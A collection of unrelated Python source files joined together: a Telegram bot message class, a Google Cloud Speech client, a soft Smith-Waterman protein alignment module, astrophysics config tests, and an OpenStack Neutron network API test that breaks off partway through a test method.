def is_reply(self):
return self.reply_to_message != None
def is_photo(self):
return len(self.photo) > 0
def is_audio(self):
return self.audio != None
def is_document(self):
return self.document != None
def is_sticker(self):
return self.sticker != None
def is_video(self):
return self.video != None
def is_voice(self):
return self.voice != None
def is_location(self):
return self.location != None
def is_venue(self):
return self.venue != None
def _set_props(self, values = {}):
RequestingEntity._set_props(self, values)
self.chat_id = values["chat"]["id"] if "chat" in values else None
self.user_id = values["from"]["id"] if "from" in values else None
self.forward_from = User.build(values["forward_from"]) if "forward_from" in values else None
self.forward_from_chat = Chat.build(values["forward_from_chat"]) if "forward_from_chat" in values else None
self.reply_to_message = Message.build(values["reply_to_message"], self.api) if "reply_to_message" in values else None
self.entities = [MessageEntity.build(me_data) for me_data in values["entities"]] if "entities" in values else []
self.audio = Audio.build(values["audio"], self.api) if "audio" in values else None
self.document = Document.build(values["document"], self.api) if "document" in values else None
self.photo = [PhotoSize.build(photosize_data, self.api) for photosize_data in values["photo"]] if "photo" in values else []
self.sticker = Sticker.build(values["sticker"], self.api) if "sticker" in values else None
self.video = Video.build(values["video"], self.api) if "video" in values else None
self.voice = Voice.build(values["voice"], self.api) if "voice" in values else None
self.location = Location.build(values["location"]) if "location" in values else None
self.venue = Venue.build(values["venue"]) if "venue" in values else None
| |
# -*- coding: utf-8 -*-
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Accesses the google.cloud.speech.v1 Speech API."""
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.grpc_helpers
import google.api_core.operation
import google.api_core.operations_v1
import google.api_core.protobuf_helpers
import grpc
from google.cloud.speech_v1.gapic import enums
from google.cloud.speech_v1.gapic import speech_client_config
from google.cloud.speech_v1.gapic.transports import speech_grpc_transport
from google.cloud.speech_v1.proto import cloud_speech_pb2
from google.cloud.speech_v1.proto import cloud_speech_pb2_grpc
from google.longrunning import operations_pb2
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution("google-cloud-speech").version
class SpeechClient(object):
"""Service that implements Google Cloud Speech API."""
SERVICE_ADDRESS = "speech.googleapis.com:443"
"""The default address of the service."""
# The name of the interface for this client. This is the key used to
# find the method configuration in the client_config dictionary.
_INTERFACE_NAME = "google.cloud.speech.v1.Speech"
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
SpeechClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
def __init__(
self,
transport=None,
channel=None,
credentials=None,
client_config=None,
client_info=None,
):
"""Constructor.
Args:
transport (Union[~.SpeechGrpcTransport,
Callable[[~.Credentials, type], ~.SpeechGrpcTransport]): A transport
instance, responsible for actually making the API calls.
The default transport uses the gRPC protocol.
This argument may also be a callable which returns a
transport instance. Callables will be sent the credentials
as the first argument and the default transport class as
the second argument.
channel (grpc.Channel): DEPRECATED. A ``Channel`` instance
through which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is mutually exclusive with providing a
transport instance to ``transport``; doing so will raise
an exception.
client_config (dict): DEPRECATED. A dictionary of call options for
each method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# Raise deprecation warnings for things we want to go away.
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = speech_client_config.config
if channel:
warnings.warn(
"The `channel` argument is deprecated; use " "`transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
# Instantiate the transport.
# The transport is responsible for handling serialization and
# deserialization and actually sending data to the service.
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=speech_grpc_transport.SpeechGrpcTransport,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = speech_grpc_transport.SpeechGrpcTransport(
address=self.SERVICE_ADDRESS, channel=channel, credentials=credentials
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config["interfaces"][self._INTERFACE_NAME]
)
# Save a dictionary of cached API call functions.
# These are the actual callables which invoke the proper
# transport methods, wrapped with `wrap_method` to add retry,
# timeout, and the like.
self._inner_api_calls = {}
# Service calls
def recognize(
self,
config,
audio,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Performs synchronous speech recognition: receive results after all audio
has been sent and processed.
Example:
>>> from google.cloud import speech_v1
>>> from google.cloud.speech_v1 import enums
>>>
>>> client = speech_v1.SpeechClient()
>>>
>>> encoding = enums.RecognitionConfig.AudioEncoding.FLAC
>>> sample_rate_hertz = 44100
>>> language_code = 'en-US'
>>> config = {'encoding': encoding, 'sample_rate_hertz': sample_rate_hertz, 'language_code': language_code}
>>> uri = 'gs://bucket_name/file_name.flac'
>>> audio = {'uri': uri}
>>>
>>> response = client.recognize(config, audio)
Args:
config (Union[dict, ~google.cloud.speech_v1.types.RecognitionConfig]): *Required* Provides information to the recognizer that specifies how to
process the request.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.speech_v1.types.RecognitionConfig`
audio (Union[dict, ~google.cloud.speech_v1.types.RecognitionAudio]): *Required* The audio data to be recognized.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.speech_v1.types.RecognitionAudio`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.speech_v1.types.RecognizeResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "recognize" not in self._inner_api_calls:
self._inner_api_calls[
"recognize"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.recognize,
default_retry=self._method_configs["Recognize"].retry,
default_timeout=self._method_configs["Recognize"].timeout,
client_info=self._client_info,
)
request = cloud_speech_pb2.RecognizeRequest(config=config, audio=audio)
return self._inner_api_calls["recognize"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def long_running_recognize(
self,
config,
audio,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Performs asynchronous speech recognition: receive results via the
google.longrunning.Operations interface. Returns either an
``Operation.error`` or an ``Operation.response`` which contains a
``LongRunningRecognizeResponse`` message.
Example:
>>> from google.cloud import speech_v1
>>> from google.cloud.speech_v1 import enums
>>>
>>> client = speech_v1.SpeechClient()
>>>
>>> encoding = enums.RecognitionConfig.AudioEncoding.FLAC
>>> sample_rate_hertz = 44100
>>> language_code = 'en-US'
>>> config = {'encoding': encoding, 'sample_rate_hertz': sample_rate_hertz, 'language_code': language_code}
>>> uri = 'gs://bucket_name/file_name.flac'
>>> audio = {'uri': uri}
>>>
>>> response = client.long_running_recognize(config, audio)
>>>
>>> def callback(operation_future):
... # Handle result.
... result = operation_future.result()
>>>
>>> response.add_done_callback(callback)
>>>
>>> # Handle metadata.
>>> metadata = response.metadata()
Args:
config (Union[dict, ~google.cloud.speech_v1.types.RecognitionConfig]): *Required* Provides information to the recognizer that specifies how to
process the request.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.speech_v1.types.RecognitionConfig`
audio (Union[dict, ~google.cloud.speech_v1.types.RecognitionAudio]): *Required* The audio data to be recognized.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.speech_v1.types.RecognitionAudio`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.speech_v1.types._OperationFuture` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "long_running_recognize" not in self._inner_api_calls:
self._inner_api_calls[
"long_running_recognize"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.long_running_recognize,
default_retry=self._method_configs["LongRunningRecognize"].retry,
default_timeout=self._method_configs["LongRunningRecognize"].timeout,
client_info=self._client_info,
)
request = cloud_speech_pb2.LongRunningRecognizeRequest(
config=config, audio=audio
)
operation = self._inner_api_calls["long_running_recognize"](
request, retry=retry, timeout=timeout, metadata=metadata
)
return google.api_core.operation.from_gapic(
operation,
self.transport._operations_client,
cloud_speech_pb2.LongRunningRecognizeResponse,
metadata_type=cloud_speech_pb2.LongRunningRecognizeMetadata,
)
def streaming_recognize(
self,
requests,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Performs bidirectional streaming speech recognition: receive results while
sending audio. This method is only available via the gRPC API (not REST).
EXPERIMENTAL: This method interface might change in the future.
Example:
>>> from google.cloud import speech_v1
>>>
>>> client = speech_v1.SpeechClient()
>>>
>>> request = {}
>>>
>>> requests = [request]
>>> for element in client.streaming_recognize(requests):
... # process element
... pass
Args:
requests (iterator[dict|google.cloud.speech_v1.proto.cloud_speech_pb2.StreamingRecognizeRequest]): The input objects. If a dict is provided, it must be of the
same form as the protobuf message :class:`~google.cloud.speech_v1.types.StreamingRecognizeRequest`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
Iterable[~google.cloud.speech_v1.types.StreamingRecognizeResponse].
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "streaming_recognize" not in self._inner_api_calls:
self._inner_api_calls[
"streaming_recognize"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.streaming_recognize,
default_retry=self._method_configs["StreamingRecognize"].retry,
default_timeout=self._method_configs["StreamingRecognize"].timeout,
client_info=self._client_info,
)
return self._inner_api_calls["streaming_recognize"](
requests, retry=retry, timeout=timeout, metadata=metadata
)
| |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Smith-Waterman functions for protein alignment in NumPy."""
from typing import Optional
import numpy as np
from scipy import special
def _alignment_matrices(len_1, len_2, i = 0, j = 0,
curr = "M", prev = "S",
alignment = None):
"""Helper function for alignment_matrices."""
if alignment is None:
alignment = np.zeros((len_1, len_2, 9))
# M=match, X=gap_x, Y=gap_y
lookup = {
("S", "M"): 0,
("M", "M"): 1,
("X", "M"): 2,
("Y", "M"): 3,
("M", "X"): 4,
("X", "X"): 5,
("M", "Y"): 6,
("X", "Y"): 7,
("Y", "Y"): 8,
}
alignment[i, j, lookup[(prev, curr)]] = 1
if curr == "M":
yield alignment
if i < len_1 - 1:
# We can go down.
yield from _alignment_matrices(len_1, len_2, i=i+1, j=j, curr="Y",
prev=curr, alignment=alignment.copy())
if i < len_1 - 1 and j < len_2 - 1:
# We can go in diagonal.
yield from _alignment_matrices(len_1, len_2, i=i+1, j=j+1, curr="M",
prev=curr, alignment=alignment.copy())
if j < len_2 - 1 and curr != "Y":
# We can go right.
yield from _alignment_matrices(len_1, len_2, i=i, j=j+1,
curr="X", prev=curr,
alignment=alignment.copy())
def alignment_matrices(len_1, len_2):
"""Generator of all alignment matrices of shape (len_1, len_2, 9).
Args:
len_1: length of first sequence.
len_2: length of second sequence.
Yields:
All alignment matrices of shape (len_1, len_2, 9)
"""
# Iterates over all possible starting states.
for i in range(len_1):
for j in range(len_2):
yield from _alignment_matrices(len_1, len_2, i=i, j=j)
def _make_op(temperature=1.0):
"""Make softmax + softargmax operator."""
def op(*args):
if len(args) == 1: # op(arr)
arr = np.array(args[0])
else: # lse_op(ele1, ele2, ...)
arr = np.array(args)
if temperature > 0:
return (temperature * special.logsumexp(arr / temperature),
special.softmax(arr / temperature))
else:
ret = np.zeros_like(arr)
ret[np.argmax(arr)] = 1
return np.max(arr), ret
return op
def _soft_sw_affine(sim_mat,
gap_open,
gap_extend,
temperature = 1.0,
ret_grads = False):
"""Computes soft Smith-Waterman with affine gaps.
Args:
sim_mat: a np.ndarray<float>[len1, len2] the substitution
values for pairs of sequences.
gap_open: float penalty in the substitution values for opening a gap.
gap_extend: float of penalty in the substitution values for extending a gap.
temperature: float controlling the regularization strength.
ret_grads: whether to return gradients or not.
Returns:
value if ret_grads is False
value, g_sim_mat, g_gap_open, g_gap_extend if ret_grads is True
value = float of softmax values
g_sim_mat = np.ndarray<float>[len_1, len_2]
g_gap_open = float
g_gap_extend = float
"""
len_1, len_2 = sim_mat.shape
match = np.zeros((len_1 + 1, len_2 + 1))
match_p = np.zeros((len_1 + 2, len_2 + 2, 4))
gap_x = np.zeros((len_1 + 1, len_2 + 1))
gap_x_p = np.zeros((len_1 + 2, len_2 + 2, 2))
gap_y = np.zeros((len_1 + 1, len_2 + 1))
gap_y_p = np.zeros((len_1 + 2, len_2 + 2, 3))
float_max = np.finfo(np.float32).max
if temperature > 0:
for mat in (match, gap_x, gap_y):
mat[0, :] = mat[:, 0] = -float_max
op = _make_op(temperature=temperature)
for i in range(1, len_1 + 1):
for j in range(1, len_2 + 1):
match[i, j], match_p[i, j] = op(0, match[i-1, j-1],
gap_x[i-1, j-1], gap_y[i-1, j-1])
match[i, j] += sim_mat[i-1, j-1]
gap_x[i, j], gap_x_p[i, j] = op(match[i, j-1] - gap_open,
gap_x[i, j-1] - gap_extend)
gap_y[i, j], gap_y_p[i, j] = op(match[i-1, j] - gap_open,
gap_x[i-1, j] - gap_open,
gap_y[i-1, j] - gap_extend)
value, probas = op(match.ravel())
probas = probas.reshape(match.shape)
if not ret_grads:
return value
match_e = np.zeros((len_1 + 2, len_2 + 2))
gap_x_e = np.zeros((len_1 + 2, len_2 + 2))
gap_y_e = np.zeros((len_1 + 2, len_2 + 2))
for j in reversed(range(1, len_2 + 1)):
for i in reversed(range(1, len_1 + 1)):
gap_y_e[i, j] = (match_e[i+1, j+1] * match_p[i+1, j+1, 3] +
gap_y_e[i+1, j] * gap_y_p[i+1, j, 2])
gap_x_e[i, j] = (match_e[i+1, j+1] * match_p[i+1, j+1, 2] +
gap_x_e[i, j+1] * gap_x_p[i, j+1, 1] +
gap_y_e[i+1, j] * gap_y_p[i+1, j, 1])
match_e[i, j] = (match_e[i+1, j+1] * match_p[i+1, j+1, 1] +
gap_x_e[i, j+1] * gap_x_p[i, j+1, 0] +
gap_y_e[i+1, j] * gap_y_p[i+1, j, 0] +
probas[i, j])
g_sim_mat = np.zeros_like(sim_mat)
g_gap_open = np.zeros_like(sim_mat)
g_gap_extend = np.zeros_like(sim_mat)
for i in range(1, len_1 + 1):
for j in range(1, len_2 + 1):
g_sim_mat[i-1, j-1] = match_e[i, j]
g_gap_open[i-1, j-1] = (gap_x_e[i, j+1] * (-gap_x_p[i, j+1, 0]) +
gap_y_e[i+1, j] * (-gap_y_p[i+1, j, 0] -
gap_y_p[i+1, j, 1]))
g_gap_extend[i-1, j-1] = (gap_x_e[i, j+1] * (-gap_x_p[i, j+1, 1]) +
gap_y_e[i+1, j] * (-gap_y_p[i+1, j, 2]))
return value, g_sim_mat, np.sum(g_gap_open), np.sum(g_gap_extend)
def soft_sw_affine(sim_mat,
gap_open,
gap_extend,
temperature = 1.0,
ret_grads = False):
"""Computes soft Smith-Waterman with affine gaps.
Args:
sim_mat: a np.ndarray<float>[batch, len1, len2] the substitution
values for pairs of sequences.
gap_open: a np.ndarray<float>[batch] of penalty in the substitution values
for opening a gap.
gap_extend: a np.ndarray<float>[batch] of penalty in the substitution values
for extending a gap.
temperature: float controlling the regularization strength.
ret_grads: whether to return gradients or not.
Returns:
values if ret_grads is False
values, g_sim_mat, g_gap_open, g_gap_extend if ret_grads is True
values = np.ndarray<float>[batch] of softmax values
g_sim_mat = np.ndarray<float>[batch, len_1, len_2]
g_gap_open = np.ndarray<float>[batch]
g_gap_extend = np.ndarray<float>[batch]
"""
# TODO(mblondel): avoid naive for loop.
arr = [_soft_sw_affine(sim_mat[i], gap_open[i], gap_extend[i],
temperature=temperature, ret_grads=ret_grads)
for i in range(sim_mat.shape[0])]
if ret_grads:
return tuple(np.array(elements) for elements in zip(*arr))
else:
return np.array(arr)
| |
# tests for the config reader module
import os
from attr import validate
import pytest
import pandas as pd
from numpy.testing import assert_almost_equal
from jsonschema.exceptions import ValidationError
from tardis.io import config_reader
from tardis.io.config_reader import Configuration
def data_path(filename):
data_dir = os.path.dirname(__file__)
return os.path.abspath(os.path.join(data_dir, "data", filename))
def test_convergence_section_parser():
test_convergence_section = {
"type": "damped",
"lock_t_inner_cyles": 1,
"t_inner_update_exponent": -0.5,
"damping_constant": 0.5,
"threshold": 0.05,
"fraction": 0.8,
"hold_iterations": 3,
"t_rad": {"damping_constant": 1.0},
}
parsed_convergence_section = config_reader.parse_convergence_section(
test_convergence_section
)
assert_almost_equal(
parsed_convergence_section["t_rad"]["damping_constant"], 1.0
)
assert_almost_equal(
parsed_convergence_section["w"]["damping_constant"], 0.5
)
def test_from_config_dict(tardis_config_verysimple):
conf = Configuration.from_config_dict(
tardis_config_verysimple, validate=True, config_dirname="test"
)
assert conf.config_dirname == "test"
assert_almost_equal(
conf.spectrum.start.value,
tardis_config_verysimple["spectrum"]["start"].value,
)
assert_almost_equal(
conf.spectrum.stop.value,
tardis_config_verysimple["spectrum"]["stop"].value,
)
tardis_config_verysimple["spectrum"]["start"] = "Invalid"
with pytest.raises(ValidationError):
conf = Configuration.from_config_dict(
tardis_config_verysimple, validate=True, config_dirname="test"
)
def test_config_hdf(hdf_file_path, tardis_config_verysimple):
expected = Configuration.from_config_dict(
tardis_config_verysimple, validate=True, config_dirname="test"
)
expected.to_hdf(hdf_file_path, overwrite=True)
actual = pd.read_hdf(hdf_file_path, key="/simulation/config")
expected = expected.get_properties()["config"]
assert actual[0] == expected[0]
def test_model_section_config(tardis_config_verysimple):
"""
Configuration Validation Test for Model Section of the Tardis Config YAML File
Validates:
Density: branch85_w7
Velocity (Start < End)
Parameter
---------
`tardis_config_verysimple` : YAML File
Result
------
Assertion based on validation for specified values
"""
conf = Configuration.from_config_dict(
tardis_config_verysimple, validate=True, config_dirname="test"
)
assert conf.model.structure.density.type == "branch85_w7"
tardis_config_verysimple["model"]["structure"]["velocity"][
"start"
] = "2.0e4 km/s"
tardis_config_verysimple["model"]["structure"]["velocity"][
"stop"
] = "1.1e4 km/s"
with pytest.raises(ValueError) as ve:
if (
conf.model.structure.velocity.start
< conf.model.structure.velocity.stop
):
raise ValueError("Stop Value must be greater than Start Value")
assert ve.type is ValueError
def test_supernova_section_config(tardis_config_verysimple):
"""
Configuration Validation Test for Supernova Section of the Tardis Config YAML File
Validates:
Time of Explosion (Must always be positive)
Luminosity Wavelength Limits (Start < End)
Parameter
---------
`tardis_config_verysimple` : YAML File
Result
------
Assertion based on validation for specified values
"""
conf = Configuration.from_config_dict(
tardis_config_verysimple, validate=True, config_dirname="test"
)
tardis_config_verysimple["supernova"]["time_explosion"] = "-10 day"
tardis_config_verysimple["supernova"][
"luminosity_wavelength_start"
] = "15 angstrom"
tardis_config_verysimple["supernova"][
"luminosity_wavelength_end"
] = "0 angstrom"
with pytest.raises(ValueError) as ve:
if conf.supernova.time_explosion.value > 0:
raise ValueError("Time of Explosion cannot be negative")
assert ve.type is ValueError
with pytest.raises(ValueError) as ve:
if (
conf.supernova.luminosity_wavelength_start.value
< conf.supernova.luminosity_wavelength_end.value
):
raise ValueError(
"End Limit must be greater than Start Limit for Luminosity"
)
assert ve.type is ValueError
def test_plasma_section_config(tardis_config_verysimple):
"""
Configuration Validation Test for Plasma Section of the Tardis Config YAML File
Validates:
Initial temperature inner (must be greater than -1K)
Initial radiative temperature (must be greater than -1K)
Parameter
---------
`tardis_config_verysimple` : YAML File
Result
------
Assertion based on validation for specified values
"""
conf = Configuration.from_config_dict(
tardis_config_verysimple, validate=True, config_dirname="test"
)
tardis_config_verysimple["plasma"]["initial_t_inner"] = "-100 K"
tardis_config_verysimple["plasma"]["initial_t_rad"] = "-100 K"
with pytest.raises(ValueError) as ve:
if (conf.plasma.initial_t_inner.value >= -1) and (
conf.plasma.initial_t_rad.value >= -1
):
raise ValueError("Initial Temperatures are Invalid")
assert ve.type is ValueError
def test_spectrum_section_config(tardis_config_verysimple):
"""
Configuration Validation Test for Plasma Section of the Tardis Config YAML File
Validates:
Spectrum Start & End Limits (Start < End)
Parameter
---------
`tardis_config_verysimple` : YAML File
Result
------
Assertion based on validation for specified values
"""
conf = Configuration.from_config_dict(
tardis_config_verysimple, validate=True, config_dirname="test"
)
tardis_config_verysimple["spectrum"]["start"] = "2500 angstrom"
tardis_config_verysimple["spectrum"]["stop"] = "500 angstrom"
with pytest.raises(ValueError) as ve:
if not conf.spectrum.stop.value < conf.spectrum.start.value:
raise ValueError("Start Value must be less than Stop Value")
assert ve.type is ValueError
| |
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import netaddr
import six
from tempest_lib.common.utils import data_utils
from tempest_lib import exceptions as lib_exc
from neutron.tests.api import base
from neutron.tests.tempest.common import custom_matchers
from neutron.tests.tempest import config
from neutron.tests.tempest import test
CONF = config.CONF
class NetworksTestJSON(base.BaseNetworkTest):
"""
Tests the following operations in the Neutron API using the REST client for
Neutron:
create a network for a tenant
list tenant's networks
show a tenant network details
create a subnet for a tenant
list tenant's subnets
show a tenant subnet details
network update
subnet update
delete a network also deletes its subnets
list external networks
All subnet tests are run once with ipv4 and once with ipv6.
v2.0 of the Neutron API is assumed. It is also assumed that the following
options are defined in the [network] section of etc/tempest.conf:
tenant_network_cidr with a block of cidr's from which smaller blocks
can be allocated for tenant ipv4 subnets
tenant_network_v6_cidr is the equivalent for ipv6 subnets
tenant_network_mask_bits with the mask bits to be used to partition the
block defined by tenant_network_cidr
tenant_network_v6_mask_bits is the equivalent for ipv6 subnets
"""
@classmethod
def resource_setup(cls):
super(NetworksTestJSON, cls).resource_setup()
cls.network = cls.create_network()
cls.name = cls.network['name']
cls.subnet = cls._create_subnet_with_last_subnet_block(cls.network,
cls._ip_version)
cls.cidr = cls.subnet['cidr']
cls._subnet_data = {6: {'gateway':
str(cls._get_gateway_from_tempest_conf(6)),
'allocation_pools':
cls._get_allocation_pools_from_gateway(6),
'dns_nameservers': ['2001:4860:4860::8844',
'2001:4860:4860::8888'],
'host_routes': [{'destination': '2001::/64',
'nexthop': '2003::1'}],
'new_host_routes': [{'destination':
'2001::/64',
'nexthop': '2005::1'}],
'new_dns_nameservers':
['2001:4860:4860::7744',
'2001:4860:4860::7888']},
4: {'gateway':
str(cls._get_gateway_from_tempest_conf(4)),
'allocation_pools':
cls._get_allocation_pools_from_gateway(4),
'dns_nameservers': ['8.8.4.4', '8.8.8.8'],
'host_routes': [{'destination': '10.20.0.0/32',
'nexthop': '10.100.1.1'}],
'new_host_routes': [{'destination':
'10.20.0.0/32',
'nexthop':
'10.100.1.2'}],
'new_dns_nameservers': ['7.8.8.8', '7.8.4.4']}}
@classmethod
def _create_subnet_with_last_subnet_block(cls, network, ip_version):
"""Derive last subnet CIDR block from tenant CIDR and
create the subnet with that derived CIDR
"""
if ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
elif ip_version == 6:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
subnet_cidr = list(cidr.subnet(mask_bits))[-1]
gateway_ip = str(netaddr.IPAddress(subnet_cidr) + 1)
return cls.create_subnet(network, gateway=gateway_ip,
cidr=subnet_cidr, mask_bits=mask_bits)
@classmethod
def _get_gateway_from_tempest_conf(cls, ip_version):
"""Return first subnet gateway for configured CIDR """
if ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
elif ip_version == 6:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
if mask_bits >= cidr.prefixlen:
return netaddr.IPAddress(cidr) + 1
else:
for subnet in cidr.subnet(mask_bits):
return netaddr.IPAddress(subnet) + 1
@classmethod
def _get_allocation_pools_from_gateway(cls, ip_version):
"""Return allocation range for subnet of given gateway"""
gateway = cls._get_gateway_from_tempest_conf(ip_version)
return [{'start': str(gateway + 2), 'end': str(gateway + 3)}]
def subnet_dict(self, include_keys):
"""Return a subnet dict which has include_keys and their corresponding
value from self._subnet_data
"""
return dict((key, self._subnet_data[self._ip_version][key])
for key in include_keys)
def _compare_resource_attrs(self, actual, expected):
exclude_keys = set(actual).symmetric_difference(expected)
self.assertThat(actual, custom_matchers.MatchesDictExceptForKeys(
expected, exclude_keys))
def _delete_network(self, network):
# Deleting network also deletes its subnets if exists
self.client.delete_network(network['id'])
if network in self.networks:
self.networks.remove(network)
for subnet in self.subnets:
if subnet['network_id'] == network['id']:
self.subnets.remove(subnet)
def _create_verify_delete_subnet(self, cidr=None, mask_bits=None,
**kwargs):
network = self.create_network()
net_id = network['id']
gateway = kwargs.pop('gateway', None)
subnet = self.create_subnet(network, gateway, cidr, mask_bits,
**kwargs)
compare_args_full = dict(gateway_ip=gateway, cidr=cidr,
mask_bits=mask_bits, **kwargs)
compare_args = dict((k, v) for k, v in six.iteritems(compare_args_full)
if v is not None)
if 'dns_nameservers' in set(subnet).intersection(compare_args):
self.assertEqual(sorted(compare_args['dns_nameservers']),
sorted(subnet['dns_nameservers']))
del subnet['dns_nameservers'], compare_args['dns_nameservers']
self._compare_resource_attrs(subnet, compare_args)
self.client.delete_network(net_id)
self.networks.pop()
self.subnets.pop()
@test.attr(type='smoke')
@test.idempotent_id('0e269138-0da6-4efc-a46d-578161e7b221')
def test_create_update_delete_network_subnet(self):
# Create a network
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
self.addCleanup(self._delete_network, network)
net_id = network['id']
self.assertEqual('ACTIVE', network['status'])
# Verify network update
new_name = "New_network"
body = self.client.update_network(net_id, name=new_name)
updated_net = body['network']
self.assertEqual(updated_net['name'], new_name)
# Find a cidr that is not in use yet and create a subnet with it
subnet = self.create_subnet(network)
subnet_id = subnet['id']
# Verify subnet update
new_name = "New_subnet"
body = self.client.update_subnet(subnet_id, name=new_name)
updated_subnet = body['subnet']
self.assertEqual(updated_subnet['name'], new_name)
@test.attr(type='smoke')
@test.idempotent_id('2bf13842-c93f-4a69-83ed-717d2ec3b44e')
def test_show_network(self):
# Verify the details of a network
body = self.client.show_network(self.network['id'])
network = body['network']
for key in ['id', 'name', 'mtu']:
self.assertEqual(network[key], self.network[key])
@test.attr(type='smoke')
@test.idempotent_id('867819bb-c4b6-45f7-acf9-90edcf70aa5e')
def test_show_network_fields(self):
# Verify specific fields of a network
fields = ['id', 'name', 'mtu']
body = self.client.show_network(self.network['id'],
fields=fields)
network = body['network']
